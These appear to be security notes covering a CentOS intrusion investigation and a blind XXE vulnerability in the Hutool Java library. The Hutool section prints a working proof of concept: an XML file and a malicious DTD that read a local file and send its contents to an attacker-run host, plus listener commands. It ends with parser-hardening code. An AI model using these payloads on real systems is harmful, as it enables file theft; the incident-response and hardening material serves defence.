Incident response on a CentOS host

First, check for abnormal connections and listening ports:

netstat -antp

There is an abnormal connection to 192.168.226.131:6666 made by shell.elf, suspected to be a trojan.
Locate the file by its pid:

lsof -p pid   # pid of the shell.elf process shown by netstat

The trojan is found at /root/shell.elf.
Checking history and .bash_history shows that the records have already been cleared.
Look for privileged (UID 0) accounts:

awk -F: '$3==0 {print $1}' /etc/passwd

Compare them with the accounts that can log in remotely:

# accounts that have a password hash set ($1$ MD5 or $6$ SHA-512); -F: is needed, shadow is colon-separated
awk -F: '/\$1|\$6/{print $1}' /etc/shadow
# successful SSH logins: date, time, user name and source IP
grep "Accepted " /var/log/secure* | awk '{print $1,$2,$3,$9,$11}'

From this we confirm that the wxiaoge account is a backdoor account created by the attacker.
Check scheduled tasks (cron):
Look for command-replacement backdoors; use rpm to verify whether packaged files have been modified:

rpm -Vf /usr/bin/*
rpm -Vf /usr/sbin/*

S: file Size differs;
T: mTime (modification time) differs;
5: MD5 digest differs;
D: Device major/minor number differs;
L: symbolic Link target differs;
U: User ownership differs;
G: Group ownership differs;
M: Mode (permissions and file type) differs;
It was then found that the file type of ps is "script text"; inspect it:
The backdoor ELF is found; scan it with VirusTotal:
So there are two backdoors, shell.elf and centos_core.elf. From the creation times, the order in which the backdoors were planted was: the shell.elf backdoor, the centos_core.elf backdoor, the ps command-replacement backdoor, and the cron job.
Remediation:

# remove the two backdoor ELF files
rm -rf /root/shell.elf
rm -rf /centos_core.elf
# remove the script that replaced ps and restore the original binary from the hidden directory
rm -rf /usr/bin/ps
mv /.hide_command/ps /usr/bin/ps
# delete the wxiaoge backdoor account
vim /etc/passwd
# delete the malicious cron entry
crontab -e

Tracing summary
The attacker brute-forced the server on January 13 from 21:51:32 to 21:58:31, and at 21:57:56 successfully brute-forced the root password and logged in. After logging in, on January 14 at 00:51:12 they planted the shell.elf backdoor, at 00:57:03 the centos_core.elf backdoor, at 01:03:42 the ps command backdoor, and at 01:05:53 wrote the malicious cron job. Malicious IP: 192.168.226.1

Hutool-XXE

Hutool is a small but comprehensive library of Java tools. A blind XXE vulnerability exists in its XML parsing module before v5.8.19, which may lead to arbitrary file reads.

Position

This vulnerability originates in the readBySax function in XmlUtil.java, which uses SAXParserFactory with its default settings and is therefore susceptible to XXE attacks.

public static void readBySax(InputSource source, ContentHandler contentHandler) {
    // 1. Obtain the parser factory
    if (null == factory) {
        factory = SAXParserFactory.newInstance();
        factory.setValidating(false);
        factory.setNamespaceAware(namespaceAware);
    }
    // 2. Obtain a parser from the factory
    final SAXParser parse;
    XMLReader reader;
    try {
        parse = factory.newSAXParser();
    ...

Xxploitation

First, you need to parse an XML document that references a malicious external DTD:

xxeTest.java:

package cn.hutool.core;

import cn.hutool.core.collection.CollUtil;
import cn.hutool.core.io.resource.ResourceUtil;
import cn.hutool.core.util.XmlUtil;
import org.xml.sax.helpers.DefaultHandler;

import java.util.HashSet;

public class xxeTest {
    public static void main(String[] args) {
        final HashSet<String> eles = CollUtil.newHashSet(
                "returnssms", "returnstatus", "message", "remainpoint", "teskID", "successCounts");
        XmlUtil.readBySax(ResourceUtil.getStream("C:\\Users\\vanya\\Documents\\GitHub\\hutool\\hutool-core\\src\\main\\java\\cn\\hutool\\core\\test.xml"), new DefaultHandler());
    }
}

test.xml:

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://192.168.3.183/evil.dtd"> %xxe; ]>

The malicious external DTD is fetched from the HTTP server we deployed on 192.168.3.183:80:

python3 -m http.server 80

Since XmlUtil.java does not echo the parsed content back to us (a blind XXE), the DTD exfiltrates the file's contents through a second HTTP request.

evil.dtd:

<!ENTITY % file SYSTEM "file:///g:/test.txt">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://192.168.3.183:9999/?x=%file;'>">
%eval;
%exfil;

We also need netcat listening on port 9999. When we run xxeTest.java, the request for evil.dtd arrives first, followed by the request carrying the contents of G:/test.txt:

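For the defender's side, an added example (not Hutool's own code) that builds SAXParserFactory two ways, one mirroring the default setup of readBySax above and one hardened, and feeds each the DOCTYPE shape from test.xml. The class name and the attacker.invalid host are constructed placeholders.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;
import org.xml.sax.helpers.DefaultHandler;

public class SaxHardeningDemo {
    // Constructed sample with the same shape as test.xml; .invalid TLD, so nothing is reachable.
    static final String PAYLOAD =
        "<?xml version=\"1.0\" encoding=\"utf-8\" ?>\n"
      + "<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM \"http://attacker.invalid/evil.dtd\"> %xxe; ]>\n"
      + "<foo/>";

    // Same setup as the vulnerable readBySax: validation off, nothing else restricted.
    static SAXParserFactory defaultFactory() {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setValidating(false);
        return f;
    }

    // Hardened: reject DOCTYPE outright; the remaining switches are defence in depth.
    static SAXParserFactory hardenedFactory() throws Exception {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setValidating(false);
        f.setXIncludeAware(false);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        return f;
    }

    // Classifies what a factory's parser did with the payload.
    static String outcome(SAXParserFactory f) throws Exception {
        try {
            f.newSAXParser().parse(new InputSource(new StringReader(PAYLOAD)), new DefaultHandler());
            return "parsed";                        // entity resolved or silently ignored
        } catch (SAXParseException e) {
            return "rejected: " + e.getMessage();   // refused before any network access
        } catch (IOException e) {
            return "fetch attempted: " + e;         // parser tried to reach the DTD host
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println("default  -> " + outcome(defaultFactory()));
        System.out.println("hardened -> " + outcome(hardenedFactory()));
    }
}
```

On a JDK whose JAXP defaults still allow external DTD access, the default factory reports a fetch attempt while the hardened one rejects the DOCTYPE with a SAXParseException and never touches the network.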